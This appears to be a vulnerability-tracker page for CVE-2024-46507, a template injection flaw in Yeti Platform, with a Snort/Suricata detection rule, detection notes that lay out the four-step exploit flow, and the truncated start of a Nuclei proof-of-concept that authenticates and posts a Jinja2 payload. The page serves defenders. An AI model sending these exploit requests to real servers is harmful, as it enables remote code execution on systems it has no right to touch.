CVE-2024-46507
published 2026-05-08CVE-2024-46507: A SSTI (server side template injection) vulnerability in the custom template export function in yeti-platform yeti before 2.1.12 allows attackers to execute…
PriorityP278high7.3CVSS 3.1
AVNACLPRNUINSUCLILAL
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
3.92%
89.0th percentile
A SSTI (server side template injection) vulnerability in the custom template export function in yeti-platform yeti before 2.1.12 allows attackers to execute code on the application server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yeti-platform | yeti | >= 2.0 < 2.1.12 | 2.1.12 |
Detection & IOCsextracted from sources · hover to see the quote
url/api/v2/auth/token
url/api/v2/templates/
url/api/v2/templates/render
cookieyeti_session=eyJ
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v2/templates/"; fast_pattern; http.cookie; content:"yeti_session|3d|eyJ"; http.request_body; content:"|22|template|22 3a|"; content:"|7b 25|"; distance:0; pcre:"/^[^\x2e]*?(?:\x2e\x5f{1,2}\w+)+[\x28\x5b]/R"; reference:url,github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-46507; reference:cve,2024-45607; classtype:web-application-attack; sid:2059842; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_02_03, cve CVE_2024_45607, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_02_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)bytes
|22|template|22 3a|
bytes
|7b 25|
- →The Snort/Suricata PCRE `/^[^\x2e]*?(?:\x2e\x5f{1,2}\w+)+[\x28\x5b]/R` matches Python dunder-attribute traversal chains (e.g., .__class__.__base__) in the request body, which is the core SSTI gadget pattern.
- →Exploitation requires authentication first. Monitor for POST to /api/v2/auth/token followed shortly by POST to /api/v2/templates/ and /api/v2/templates/render from the same source IP.
- →The exploit flow is: (1) authenticate, (2) create a malicious template via POST /api/v2/templates/, (3) create an observable, (4) render the template via POST /api/v2/templates/render. Alerting on this 4-step sequence is a high-fidelity detection.
- →Session cookie prefix 'yeti_session=eyJ' (base64-encoded JSON JWT) is present in exploit traffic; can be used as an additional filter in HTTP-layer detections.
- →The Jinja2 template block opener |7b 25| ({%) in the request body to /api/v2/templates/ is a strong indicator of template injection attempt.
- ·The Snort rule references CVE-2024-45607 in its metadata/msg but the actual vulnerability being exploited is CVE-2024-46507. Ensure SID 2059842 is mapped to the correct CVE in your SIEM/IDS.
- ·The Nuclei PoC template requires valid credentials (username/password variables) to authenticate before exploiting. Detection rules should account for authenticated SSTI attempts, not just unauthenticated probes.
- ·The Snort rule specifies 'tls_state TLSDecrypt' in metadata, meaning it will only fire on decrypted TLS traffic. Deploy with SSL inspection enabled or supplement with endpoint-level detection for encrypted environments.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)
suricata·2025-02-03·CVSS 5.8
CVE-2024-45607 [MEDIUM] ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)
ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v2/templates/"; fast_pattern; http.cookie; content:"yeti_session|3d|eyJ"; http.request_body; content:"|22|template|22 3a|"; content:"|7b 25|"; distance:0; pcre:"/^[^\x2e]*?(?:\x2e\x5f{1,2}\w+)+[\x28\x5b]/R"; reference:url,github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-46507; reference:cve,2024-45607; classtype:web-application-attack; sid:2059842; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_02_03, cve CVE_2024_45607, deployment Perimeter, deployment
Nuclei
Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
nuclei
CVE-2024-46507 Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
Yeti Platform "
verified: true
max-request: 4
tags: cve,cve2024,yeti,platform,ssti,rce,intrusive,vkev,vuln
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v2/auth/token HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryodI9qNm7xBZLCq9n
------WebKitFormBoundaryodI9qNm7xBZLCq9n
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryodI9qNm7xBZLCq9n
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryodI9qNm7xBZLCq9n--
matchers:
- type: word
part: body
words:
- access_token
internal: true
- raw:
- |
POST /api/v2/templates/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"template":{"name":"AA","template":"value,tags\n{% for obj
2026-05-08
Published
Exploited in the wild